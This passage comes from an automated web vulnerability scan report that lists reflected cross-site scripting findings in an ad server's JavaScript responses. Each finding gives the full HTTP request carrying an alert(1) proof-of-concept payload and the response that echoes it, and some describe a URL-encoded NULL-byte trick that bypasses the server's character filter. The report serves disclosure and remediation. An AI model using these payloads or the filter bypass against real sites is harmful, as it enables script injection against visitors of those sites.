   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
Bnodecode%3Dyes%3Blink%3D%24,http%3A%2F%2Fwww.toronto.com%2Fsearchresults%3Fq%3D%27%27aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____hoyt%2520llc%2520poc%2520xss%252011-19-2010,&a6b4a'-alert(1)-'38701d47715=1')
AT_VARSTRING="?cli"+"ckTAG=javascript:void(win"+"dow.open('"+AT_COUNT+AT_CLICK+"','','"+AT_MICROSITE1352254+"'))";
AT_TARGET1352254="_self";
}
window.AT_ClickFn1352254= function (click)
{    click=(i
...[SNIP]...

2.151. http://adserver.adtechus.com/addyn/3.0/5294.1/1352254/0/154/ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5294.1/1352254/0/154/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %009e5b8"-alert(1)-"4a2fd5a3ebb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9e5b8"-alert(1)-"4a2fd5a3ebb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /addyn/3.0/5294.1/1352254/0/154/ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;grp=707;misc=1290207889864;aduho=-360;rdclick=http://ads.olivebrandresponse.com/clk?2,13%3Bc2ebe1bb9c45dd5b%3B12c666372f8,0%3B%3B%3B3971821727,Z4UBAC2JEwBhhFcAAAAAAG.XFwAAAAAAAAAwAAoAAAAAAAoABAAGEhnHHwAAAAAAMcgfAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACt.QEAAAAAAAIAAgAAAAAA93JjZiwBAAAAAAAAADlmN2ZiNTljLWY0MzEtMTFkZi04MWY2LTAwMzA0OGQ1NjVlMAAzmSoAAAA=,http%3A%2F%2Fadserver.adtechus.com%2Fadlink%2F5214%2F965594%2F0%2F154%2FAdId%3D1014032%3BBnId%3D1%3Bitime%3D207979585%3Bkey%3D%2527%2527aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____Hoyt%2520LLC%2520PoC%2520XSS%252011-19-2010%3Bnodecode%3Dyes%3Blink%3D%24,http%3A%2F%2Fwww.toronto.com%2Fsearchresults%3Fq%3D%2527%2527aee2d_____%2Ftitle__________script_____alert%25281%2529_____%2Fscript_____hoyt%2520llc%2520poc%2520xss%252011-19-2010,&%009e5b8"-alert(1)-"4a2fd5a3ebb=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?Z4UBAC2JEwBhhFcAAAAAAG.XFwAAAAAAAAAwAAoAAAAAAAoABAAGEhnHHwAAAAAAMcgfAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACt.QEAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADY81GnbecvCaT6HcTc3g-BmSPte4xZHng5TK59AAAAAA==,http%3A%2F%2Fadserver.adtechus.com%2Fadlink%2F5214%2F965594%2F0%2F154%2FAdId%3D1014032%3BBnId%3D1%3Bitime%3D207979585%3Bkey%3D%2527%2527aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____Hoyt%2520LLC%2520PoC%2520XSS%252011-19-2010%3Bnodecode%3Dyes%3Blink%3D%24,http%3A%2F%2Fwww.toronto.com%2Fsearchresults%3Fq%3D%2527%2527aee2d_____%2Ftitle__________script_____alert%25281%2529_____%2Fscript_____hoyt%2520llc%2520poc%2520xss%252011-19-2010,Z%3D160x600%26x%3Dhttp%253A%252F%252Fadserver%252Eadtechus%252Ecom%252Fadlink%252F5214%252F965594%252F0%252F154%252FAdId%253D1014032%253BBnId%253D1%253Bitime%253D207979585%253Bkey%253D%252527%252527aee2d%255F%255F%255F%255F%255F%252Ftitle%255F%255F%255F%255F%255F%255F%255F%255F%255F%255Fscript%255F%255F%255F%255F%255Falert%25281%2529%255F%255F%255F%255F%255F%252Fscript%255F%255F%255F%255F%255FHoyt%252520LLC%252520PoC%252520XSS%25252011%252D19%252D2010%253Bnodecode%253Dyes%253Blink%253D%2524%26s%3D1280301%26_salt%3D2393729907%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.toronto.com%252FsearchResults%253Fq%253D%252527%252527aee2d_____%252Ftitle__________script_____alert%2525281%252529_____%252Fscript_____Hoyt%252520LLC%252520PoC%252520XSS%25252011-19-2010%26r%3D1,9f7fb59c-f431-11df-81f6-003048d565e0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
Dyes%3Blink%3D%24,http%3A%2F%2Fwww.toronto.com%2Fsearchresults%3Fq%3D%2527%2527aee2d_____%2Ftitle__________script_____alert%25281%2529_____%2Fscript_____hoyt%2520llc%2520poc%2520xss%252011-19-2010,&%009e5b8"-alert(1)-"4a2fd5a3ebb=1") + escape(AT_CLICK);
var AT_FLASHVARSSTR= "";
// if use microsite, dont add the first parameter
if (AT_MICROSITE=="") AT_FLASHVARSSTR = AT_CLICKVAR[0]+"=" + escape("http://adserver.adtechus.com/adl
...[SNIP]...

2.152. http://adserver.adtechus.com/addyn/3.0/5294.1/1352291/0/225/ADTECH [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5294.1/1352291/0/225/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9feaf"-alert(1)-"0bd34c25585 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5294.1/1352291/0/225/ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;grp=699;misc=1290207937235;aduho=-360;rdclick=http://ads.olivebrandresponse.com/clk?2,13%3Bf1be6aa0e4ccecd9%3B12c66642cb2,0%3B%3B%3B2726066490,Z4UBAC2JEwBPhFcAAAAAAG.XFwAAAAAAAABMAAYAAAAAAAoAAwAGEhnHHwAAAAAAMcgfAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACt.QEAAAAAAAIAAgAAAAAAsixkZiwBAAAAAAAAAGJiYWQxOGE0LWY0MzEtMTFkZi04MjMzLTAwMzA0OGQ3MmNiZQAzmSoAAAA=,http%3A%2F%2Fadserver.adtechus.com%2Fadlink%2F5214%2F965555%2F0%2F225%2FAdId%3D1014032%3BBnId%3D3%3Bitime%3D208027435%3Bkey%3D%2527%2527aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____Hoyt%2520LLC%2520PoC%2520XSS%252011-19-2010%3Bnodecode%3Dyes%3Blink%3D%24,http%3A%2F%2Fwww.toronto.com%2Fsearchresults%3Fq%3D%27%27aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____hoyt%2520llc%2520poc%2520xss%252011-19-2010,9feaf"-alert(1)-"0bd34c25585 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?Z4UBAC2JEwBPhFcAAAAAAG.XFwAAAAAAAABMAAYAAAAAAAoAAwAGEhnHHwAAAAAAMcgfAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACt.QEAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACLIUUinOcvCb8kaJ0q61u4Sf3TvL9Pi80V0hKNAAAAAA==,http%3A%2F%2Fadserver.adtechus.com%2Fadlink%2F5214%2F965555%2F0%2F225%2FAdId%3D1014032%3BBnId%3D3%3Bitime%3D208027435%3Bkey%3D%2527%2527aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____Hoyt%2520LLC%2520PoC%2520XSS%252011-19-2010%3Bnodecode%3Dyes%3Blink%3D%24,http%3A%2F%2Fwww.toronto.com%2Fsearchresults%3Fq%3D%27%27aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____hoyt%2520llc%2520poc%2520xss%252011-19-2010,Z%3D728x90%26x%3Dhttp%253A%252F%252Fadserver%252Eadtechus%252Ecom%252Fadlink%252F5214%252F965555%252F0%252F225%252FAdId%253D1014032%253BBnId%253D3%253Bitime%253D208027435%253Bkey%253D%252527%252527aee2d%255F%255F%255F%255F%255F%252Ftitle%255F%255F%255F%255F%255F%255F%255F%255F%255F%255Fscript%255F%255F%255F%255F%255Falert%25281%2529%255F%255F%255F%255F%255F%252Fscript%255F%255F%255F%255F%255FHoyt%252520LLC%252520PoC%252520XSS%25252011%252D19%252D2010%253Bnodecode%253Dyes%253Blink%253D%2524%26s%3D1280301%26_salt%3D2784839641%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.toronto.com%252FsearchResults%253Fq%253D%27%27aee2d_____%252Ftitle__________script_____alert%281%29_____%252Fscript_____Hoyt%252520LLC%252520PoC%252520XSS%25252011-19-2010%26r%3D1,bbad18a4-f431-11df-8233-003048d72cbe
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 2745

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
3Bnodecode%3Dyes%3Blink%3D%24,http%3A%2F%2Fwww.toronto.com%2Fsearchresults%3Fq%3D%27%27aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____hoyt%2520llc%2520poc%2520xss%252011-19-2010,9feaf"-alert(1)-"0bd34c25585http://canadianimmigrant.ca/top25\" target=\"_blank\">
...[SNIP]...

2.153. http://adserver.adtechus.com/addyn/3.0/5294.1/1352291/0/225/ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5294.1/1352291/0/225/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9886c"-alert(1)-"2cd018375f0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5294.1/1352291/0/225/ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;grp=699;misc=1290207937235;aduho=-360;rdclick=http://ads.olivebrandresponse.com/clk?2,13%3Bf1be6aa0e4ccecd9%3B12c66642cb2,0%3B%3B%3B2726066490,Z4UBAC2JEwBPhFcAAAAAAG.XFwAAAAAAAABMAAYAAAAAAAoAAwAGEhnHHwAAAAAAMcgfAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACt.QEAAAAAAAIAAgAAAAAAsixkZiwBAAAAAAAAAGJiYWQxOGE0LWY0MzEtMTFkZi04MjMzLTAwMzA0OGQ3MmNiZQAzmSoAAAA=,http%3A%2F%2Fadserver.adtechus.com%2Fadlink%2F5214%2F965555%2F0%2F225%2FAdId%3D1014032%3BBnId%3D3%3Bitime%3D208027435%3Bkey%3D%2527%2527aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____Hoyt%2520LLC%2520PoC%2520XSS%252011-19-2010%3Bnodecode%3Dyes%3Blink%3D%24,http%3A%2F%2Fwww.toronto.com%2Fsearchresults%3Fq%3D%27%27aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____hoyt%2520llc%2520poc%2520xss%252011-19-2010,&9886c"-alert(1)-"2cd018375f0=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?Z4UBAC2JEwBPhFcAAAAAAG.XFwAAAAAAAABMAAYAAAAAAAoAAwAGEhnHHwAAAAAAMcgfAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACt.QEAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACLIUUinOcvCb8kaJ0q61u4Sf3TvL9Pi80V0hKNAAAAAA==,http%3A%2F%2Fadserver.adtechus.com%2Fadlink%2F5214%2F965555%2F0%2F225%2FAdId%3D1014032%3BBnId%3D3%3Bitime%3D208027435%3Bkey%3D%2527%2527aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____Hoyt%2520LLC%2520PoC%2520XSS%252011-19-2010%3Bnodecode%3Dyes%3Blink%3D%24,http%3A%2F%2Fwww.toronto.com%2Fsearchresults%3Fq%3D%27%27aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____hoyt%2520llc%2520poc%2520xss%252011-19-2010,Z%3D728x90%26x%3Dhttp%253A%252F%252Fadserver%252Eadtechus%252Ecom%252Fadlink%252F5214%252F965555%252F0%252F225%252FAdId%253D1014032%253BBnId%253D3%253Bitime%253D208027435%253Bkey%253D%252527%252527aee2d%255F%255F%255F%255F%255F%252Ftitle%255F%255F%255F%255F%255F%255F%255F%255F%255F%255Fscript%255F%255F%255F%255F%255Falert%25281%2529%255F%255F%255F%255F%255F%252Fscript%255F%255F%255F%255F%255FHoyt%252520LLC%252520PoC%252520XSS%25252011%252D19%252D2010%253Bnodecode%253Dyes%253Blink%253D%2524%26s%3D1280301%26_salt%3D2784839641%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.toronto.com%252FsearchResults%253Fq%253D%27%27aee2d_____%252Ftitle__________script_____alert%281%29_____%252Fscript_____Hoyt%252520LLC%252520PoC%252520XSS%25252011-19-2010%26r%3D1,bbad18a4-f431-11df-8233-003048d72cbe
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
Bnodecode%3Dyes%3Blink%3D%24,http%3A%2F%2Fwww.toronto.com%2Fsearchresults%3Fq%3D%27%27aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____hoyt%2520llc%2520poc%2520xss%252011-19-2010,&9886c"-alert(1)-"2cd018375f0=1") + escape(AT_CLICK);
var AT_FLASHVARSSTR= "";
// if use microsite, dont add the first parameter
if (AT_MICROSITE=="") AT_FLASHVARSSTR = AT_CLICKVAR[0]+"=" + escape("http://adserver.adtechus.com/adl
...[SNIP]...

2.154. http://adserver.adtechus.com/addyn/3.0/5294.1/1352321/0/170/ADTECH [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5294.1/1352321/0/170/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %008ab5a"-alert(1)-"a916410fe0b was submitted in the loc parameter. This input was echoed as 8ab5a"-alert(1)-"a916410fe0b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /addyn/3.0/5294.1/1352321/0/170/ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;grp=685;misc=1290207941511;aduho=-360;rdclick=http://ads.olivebrandresponse.com/clk?2,13%3B3ff77a17b51d6ab4%3B12c66643d5d,0%3B%3B%3B130950044,Z4UBAC2JEwBShFcAAAAAAG.XFwAAAAAAAABUAAIAAAAAAAEABAAGEhnHHwAAAAAAMcgfAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACt.QEAAAAAAAIAAgAAAAAAXT1kZiwBAAAAAAAAAGJlODY4OWRlLWY0MzEtMTFkZi05MzFhLTAwMzA0OGQ3MjAyOAAzmSoAAAA=,http%3A%2F%2Fadserver.adtechus.com%2Fadlink%2F5214%2F1135723%2F0%2F170%2FAdId%3D1014032%3BBnId%3D2%3Bitime%3D208031272%3Bkey%3D%2527%2527aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____Hoyt%2520LLC%2520PoC%2520XSS%252011-19-2010%3Bnodecode%3Dyes%3Blink%3D%24,http%3A%2F%2Fwww.toronto.com%2Fsearchresults%3Fq%3D%27%27aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____hoyt%2520llc%2520poc%2520xss%252011-19-2010,%008ab5a"-alert(1)-"a916410fe0b HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?Z4UBAC2JEwBShFcAAAAAAG.XFwAAAAAAAABUAAIAAAAAAAEABAAGEhnHHwAAAAAAMcgfAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACt.QEAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADKhJdvoecvCf25CFow9MwH6OdzThKykVRSmPcYAAAAAA==,http%3A%2F%2Fadserver.adtechus.com%2Fadlink%2F5214%2F1135723%2F0%2F170%2FAdId%3D1014032%3BBnId%3D2%3Bitime%3D208031272%3Bkey%3D%2527%2527aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____Hoyt%2520LLC%2520PoC%2520XSS%252011-19-2010%3Bnodecode%3Dyes%3Blink%3D%24,http%3A%2F%2Fwww.toronto.com%2Fsearchresults%3Fq%3D%27%27aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____hoyt%2520llc%2520poc%2520xss%252011-19-2010,Z%3D300x250%26x%3Dhttp%253A%252F%252Fadserver%252Eadtechus%252Ecom%252Fadlink%252F5214%252F1135723%252F0%252F170%252FAdId%253D1014032%253BBnId%253D2%253Bitime%253D208031272%253Bkey%253D%252527%252527aee2d%255F%255F%255F%255F%255F%252Ftitle%255F%255F%255F%255F%255F%255F%255F%255F%255F%255Fscript%255F%255F%255F%255F%255Falert%25281%2529%255F%255F%255F%255F%255F%252Fscript%255F%255F%255F%255F%255FHoyt%252520LLC%252520PoC%252520XSS%25252011%252D19%252D2010%253Bnodecode%253Dyes%253Blink%253D%2524%26s%3D1280301%26_salt%3D2129417328%26X%3D5735503%2C5735521%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.toronto.com%252FsearchResults%253Fq%253D%27%27aee2d_____%252Ftitle__________script_____alert%281%29_____%252Fscript_____Hoyt%252520LLC%252520PoC%252520XSS%25252011-19-2010%26r%3D1,be8689de-f431-11df-931a-003048d72028
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
odecode%3Dyes%3Blink%3D%24,http%3A%2F%2Fwww.toronto.com%2Fsearchresults%3Fq%3D%27%27aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____hoyt%2520llc%2520poc%2520xss%252011-19-2010,%008ab5a"-alert(1)-"a916410fe0b") + escape(AT_CLICK);
var AT_FLASHVARSSTR= "";
// if use microsite, dont add the first parameter
if (AT_MICROSITE=="") AT_FLASHVARSSTR = AT_CLICKVAR[0]+"=" + escape("http://adserver.adtechus.com/adlin
...[SNIP]...

2.155. http://adserver.adtechus.com/addyn/3.0/5294.1/1352321/0/170/ADTECH [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5294.1/1352321/0/170/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7759"-alert(1)-"ec82246e13 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5294.1/1352321/0/170/ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;grp=461;misc=1290207920599;aduho=-360;rdclick=http://ads.olivebrandresponse.com/clk?2,13%3B1639eccbf993947f%3B12c6663eb54,0%3B%3B%3B3892683711,Z4UBACACDABShFcAAAAAAG.XFwAAAAAAAABIAAIAAAAAAAEAAwAGEm6kAwAAAAAAMcgfAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACt.QEAAAAAAAIAAgAAAAAAU-tjZiwBAAAAAAAAAGIxZTBiNzM2LWY0MzEtMTFkZi1iYzdmLTAwMzA0OGQ3MWU1ZQAzmSoAAAA=,http%3A%2F%2Fadserver.adtechus.com%2Fadlink%2F5214%2F1135723%2F0%2F170%2FAdId%3D607818%3BBnId%3D2%3Bitime%3D208010784%3Bkey%3D%2527%2527aee2d_____%2Ftitle__________script_____alert%28hoyt%2520llc%29_____%2Fscript_____Hoyt%2520LLC%2520PoC%2520XSS%252011-19-2010%3Bnodecode%3Dyes%3Blink%3D%24,http%3A%2F%2Fwww.toronto.com%2Fsearchresults%3Fq%3D%27%27aee2d_____%2Ftitle__________script_____alert%28hoyt%2520llc%29_____%2Fscript_____hoyt%2520llc%2520poc%2520xss%252011-19-2010,b7759"-alert(1)-"ec82246e13 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?Z4UBACACDABShFcAAAAAAG.XFwAAAAAAAABIAAIAAAAAAAEAAwAGEm6kAwAAAAAAMcgfAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACt.QEAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADTWylTi-cvCfJcgZArudJNgkPTNF-1LIuNspjWAAAAAA==,http%3A%2F%2Fadserver.adtechus.com%2Fadlink%2F5214%2F1135723%2F0%2F170%2FAdId%3D607818%3BBnId%3D2%3Bitime%3D208010784%3Bkey%3D%2527%2527aee2d_____%2Ftitle__________script_____alert%28hoyt%2520llc%29_____%2Fscript_____Hoyt%2520LLC%2520PoC%2520XSS%252011-19-2010%3Bnodecode%3Dyes%3Blink%3D%24,http%3A%2F%2Fwww.toronto.com%2Fsearchresults%3Fq%3D%27%27aee2d_____%2Ftitle__________script_____alert%28hoyt%2520llc%29_____%2Fscript_____hoyt%2520llc%2520poc%2520xss%252011-19-2010,Z%3D300x250%26x%3Dhttp%253A%252F%252Fadserver%252Eadtechus%252Ecom%252Fadlink%252F5214%252F1135723%252F0%252F170%252FAdId%253D607818%253BBnId%253D2%253Bitime%253D208010784%253Bkey%253D%252527%252527aee2d%255F%255F%255F%255F%255F%252Ftitle%255F%255F%255F%255F%255F%255F%255F%255F%255F%255Fscript%255F%255F%255F%255F%255Falert%2528hoyt%252520llc%2529%255F%255F%255F%255F%255F%252Fscript%255F%255F%255F%255F%255FHoyt%252520LLC%252520PoC%252520XSS%25252011%252D19%252D2010%253Bnodecode%253Dyes%253Blink%253D%2524%26s%3D786976%26_salt%3D3307675191%26X%3D7390298%2C5735521%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.toronto.com%252FsearchResults%253Fq%253D%27%27aee2d_____%252Ftitle__________script_____alert%28hoyt%252520llc%29_____%252Fscript_____Hoyt%252520LLC%252520PoC%252520XSS%25252011-19-2010%26r%3D1,b1e0b736-f431-11df-bc7f-003048d71e5e
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
3Dyes%3Blink%3D%24,http%3A%2F%2Fwww.toronto.com%2Fsearchresults%3Fq%3D%27%27aee2d_____%2Ftitle__________script_____alert%28hoyt%2520llc%29_____%2Fscript_____hoyt%2520llc%2520poc%2520xss%252011-19-2010,b7759"-alert(1)-"ec82246e13") + escape(AT_CLICK);
var AT_FLASHVARSSTR= "";
// if use microsite, dont add the first parameter
if (AT_MICROSITE=="") AT_FLASHVARSSTR = AT_CLICKVAR[0]+"=" + escape("http://adserver.adtechus.com/adlin
...[SNIP]...

2.156. http://adserver.adtechus.com/addyn/3.0/5294.1/1352321/0/170/ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
